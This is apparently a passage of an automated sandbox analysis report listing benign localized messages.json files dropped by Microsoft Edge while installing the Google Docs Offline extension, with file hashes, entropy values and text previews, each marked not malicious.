                                                                                                                                                                                                                                                                                                                                                              SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):848
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                                                              MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                                                              SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                                                              SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1425
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                                                              MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                                                              SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                                                              SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):961
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                                                              MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                                                              SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                                                              SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                                                              SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):959
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                                                              MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                                                              SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                                                              SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                                                              SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):968
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                                                              MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                                                              SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                                                              SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):838
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                                                              MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                                                              SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                                                              SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1305
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                                                              MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                                                              SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                                                              SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):911
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                                                              MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                                                              SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                                                              SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                                                              SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):939
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                                                              MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                                                              SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                                                              MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                                                              SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                                                              SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):972
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                                                              MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                                                              SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                                                              SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
